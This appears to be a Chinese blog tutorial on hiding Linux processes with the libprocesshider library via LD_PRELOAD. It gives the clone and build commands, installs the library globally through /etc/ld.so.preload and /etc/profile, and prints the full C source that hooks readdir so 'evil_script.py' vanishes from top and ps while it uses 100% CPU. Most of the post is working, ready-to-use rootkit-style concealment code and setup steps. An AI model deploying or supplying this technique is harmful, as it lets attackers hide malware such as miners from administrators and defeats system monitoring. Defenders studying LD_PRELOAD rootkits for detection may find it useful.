前言

  1. 本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下载
  2. 思路就是利用 LD_PRELOAD 来实现系统函数的劫持

    LD_PRELOAD是什么:

    LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

实现

1.下载程序编译

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git

Cloning into 'libprocesshider'...

remote: Counting objects: 26, done.

remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26

Unpacking objects: 100% (26/26), done.

bmfxgkpt-yhd:~# cd libprocesshider/

bmfxgkpt-yhd:~/libprocesshider# make

gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl

bmfxgkpt-yhd:~/libprocesshider#

2.移动文件到/usr/local/lib/目录下

mv libprocesshider.so /usr/local/lib/

3.把它加载到全局动态连接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

测试

  1. 我们运行evil_script.py
  2. 此时发现在top 与 ps 中都无法找到 evil_script.py

此时我们发现 cpu 100%,但是却找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE

#include <stdio.h>

#include <dlfcn.h>

#include <dirent.h>

#include <string.h>

#include <unistd.h>

/*

 * Every process with this name will be excluded

 */

static const char* process_to_filter = "evil_script.py";

/*

 * Get a directory name given a DIR* handle

 */

static int get_dir_name(DIR* dirp, char* buf, size_t size)

{

    int fd = dirfd(dirp);

    if(fd == -1) {

        return 0;

    }

    char tmp[64];

    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);

    ssize_t ret = readlink(tmp, buf, size);

    if(ret == -1) {

        return 0;

    }

    buf[ret] = 0;

    return 1;

}

/*

 * Get a process name given its pid

 */

static int get_process_name(char* pid, char* buf)

{

    if(strspn(pid, "0123456789") != strlen(pid)) {

        return 0;

    }

    char tmp[256];

    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

    FILE* f = fopen(tmp, "r");

    if(f == NULL) {

        return 0;

    }

    if(fgets(tmp, sizeof(tmp), f) == NULL) {

        fclose(f);

        return 0;

    }

    fclose(f);

    int unused;

    sscanf(tmp, "%d (%[^)]s", &unused, buf);

    return 1;

}

#define DECLARE_READDIR(dirent, readdir)                                \

static struct dirent* (*original_##readdir)(DIR*) = NULL;               \

                                                                        \

struct dirent* readdir(DIR *dirp)                                       \

{                                                                       \

    if(original_##readdir == NULL) {                                    \

        original_##readdir = dlsym(RTLD_NEXT, "readdir");               \

        if(original_##readdir == NULL)                                  \

        {                                                               \

            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \

        }                                                               \

    }                                                                   \

                                                                        \

    struct dirent* dir;                                                 \

                                                                        \

    while(1)                                                            \

    {                                                                   \

        dir = original_##readdir(dirp);                                 \

        if(dir) {                                                       \

            char dir_name[256];                                         \

            char process_name[256];                                     \

            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \

                strcmp(dir_name, "/proc") == 0 &&                       \

                get_process_name(dir->d_name, process_name) &&          \

                strcmp(process_name, process_to_filter) == 0) {         \

                continue;                                               \

            }                                                           \

        }                                                               \

        break;                                                          \

    }                                                                   \

    return dir;                                                         \

}

DECLARE_READDIR(dirent64, readdir64);

DECLARE_READDIR(dirent, readdir);
  1. 程序定义了一个变量 process_to_filter 来控制不显示哪个进程名
  2. 重写readdir,

    strcmp(process_name, process_to_filter) == 0)

    当发现当前进程名称与 process_to_filter 相同时,继续循环.

遇到的坑

  1. 某些Linux中这个程序编译通不过

    解决方法

    删除最后两行中的一行

    DECLARE_READDIR(dirent64, readdir64);

    DECLARE_READDIR(dirent, readdir);

  2. 某些Linux中使用

    echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

    并不会生效

    此时我们需要配置环境变量

    bmfxgkpt-yhd:~# vi /etc/profile

    增加一行

    export LD_PRELOAD=/usr/local/lib/libprocesshider.so

linux 下隐藏进程的一种方法的更多相关文章

  1. Linux 下操作GPIO(两种方法,驱动和mmap)(转载)

    目前我所知道的在Linux下操作GPIO有两种方法: 1.编写驱动,这当然要熟悉Linux下驱动的编写方法和技巧,在驱动里可以使用ioremap函数获得GPIO物理基地址指针,然后使用这个指针根据io ...

  2. Linux 下操作gpio(两种方法,驱动和mmap)

    目前我所知道的在linux下操作GPIO有两种方法: 1.  编写驱动,这当然要熟悉linux下驱动的编写方法和技巧,在驱动里可以使用ioremap函数获得GPIO物理基地址指针,然后使用这个指针根据 ...

  3. linux下查询进程占用的内存方法总结

    linux下查询进程占用的内存方法总结,假设现在有一个「php-cgi」的进程 ,进程id为「25282」.现在想要查询该进程占用的内存大小.linux命令行下有很多的工具进行查看,现总结常见的几种方 ...

  4. 20155212 C语言实现linux下pwd命令的两种方法

    20155212 C语言实现linux下pwd命令的两种方法 学习pwd命令 通过man pwd命令查看 pwd [OPTION],一般不加参数 -P显示当前目录的物理路径 -L显示当前目录的连接路径 ...

  5. Linux下线程同步的几种方法

    Linux下提供了多种方式来处理线程同步,最常用的是互斥锁.条件变量和信号量. 一.互斥锁(mutex) 锁机制是同一时刻只允许一个线程执行一个关键部分的代码.  1. 初始化锁 int pthrea ...

  6. linux下配置ip地址四种方法(图文方法)

    主要是用第四种方法 (1)Ifconfig命令  第一种使用ifconfig命令配置网卡的ip地址.此命令通常用来零时的测试用,计算机启动后 ip地址的配置将自动失效.具体用法如下.Ipconfig  ...

  7. Linux启动新进程的三种方法

    程序中,我们有时需要启动一个新的进程,来完成其他的工作.下面介绍了三种实现方法,以及这三种方法之间的区别. 1.system函数-调用shell进程,开启新进程system函数,是通过启动shell进 ...

  8. linux下删除空行的几种方法

    在查看linux下的配置文件时,为了便于一目了然的查看,经常会删除空行和#头的行.而linux在删除空行的方法很多,grep.sed.awk.tr等工具都能实现.现总结如下: 1.grep grep ...

  9. Linux启动新进程的几种方法汇总

    有时候,我们需要在自己的程序(进程)中启动另一个程序(进程)来帮助我们完成一些工作,那么我们需要怎么才能在自己的进程中启动其他的进程呢?在Linux中提供了不少的方法来实现这一点,下面就来介绍一个这些 ...

随机推荐

  1. 离群点检测与序列数据异常检测以及异常检测大杀器-iForest

    1. 异常检测简介 异常检测,它的任务是发现与大部分其他对象不同的对象,我们称为异常对象.异常检测算法已经广泛应用于电信.互联网和信用卡的诈骗检测.贷款审批.电子商务.网络入侵和天气预报等领域.这些异 ...

  2. Docker搭建wordpress博客环境(Centos7)

    Docker搭建wordpress博客环境(Centos7) 升级系统 yum -y update 设置docker库 sudo yum install -y yum-utils sudo yum-c ...

  3. python--继承关系

    如果子类中定义与父类同名的方法或属性,则自动会覆盖父类对应的方法或属性. 子类完全继承父类的实例 >>> class Parent: def setName(self): print ...

  4. java 操作elasticsearch之搭建测试项目环境

    在创建项目之前请确认maven是否安装好,在此我是以环境都搭建好的情况下进行示范,现在以eclipse开发工具为例,具体操作如下: 1.创建maven项目 File - new -other 2.在p ...

  5. lamp/lnmp下添加PHP扩展

    在linux下安装好基本的PHP运行环境后有时候添加了新的功能,就得增加新的扩展,比如之前没有安装redis扩展,可以手动编译安装相关的扩展可以找下下载的php源码包中,ext目录下是否有相关的扩展源 ...

  6. Usaco 2019 Jan Platinum

    Usaco 2019 Jan Platinum 要不是昨天老师给我们考了这套题,我都不知道usaco还有铂金这么一级. 插播一则新闻:杨神坚持认为铂金比黄金简单,原因竟是:铜 汞 银 铂 金(金属活动 ...

  7. 转载 【.NET基础】--委托、事件、线程(1) https://www.cnblogs.com/chengzish/p/4559268.html

    [.NET基础]--委托.事件.线程(1)   1,委托 是存放方法的指针的清单,也就是装方法的容器 A, 新建winform项目[01委托],项目中添加dg_SayHi.cs 委托类 用于存储方法 ...

  8. <数据结构与算法分析>读书笔记--要分析的问题

    通常,要分析的最重要的资源就是运行时间.有几个因素影响着程序的运行时间.有些因素(如使用编译器和计算机)显然超出了任何理论模型的范畴,因此,虽然它们是重要的,但是我们在这里还是不能考虑它们.剩下的主要 ...

  9. Jenkins临时空间不足处理办法

    环境: Jenkins版本 jenkins-2.89.4Jenkins 主从都在一台主机os版本 redhat7.2 使用yum的方式安装jenkins 发现在7.2上安装,剩余临时空间很小,通过登陆 ...

  10. 理解webpack之process.env.NODE_ENV详解(十八)

    在node中,有全局变量process表示的是当前的node进程.process.env包含着关于系统环境的信息.但是process.env中并不存在NODE_ENV这个东西.NODE_ENV是用户一 ...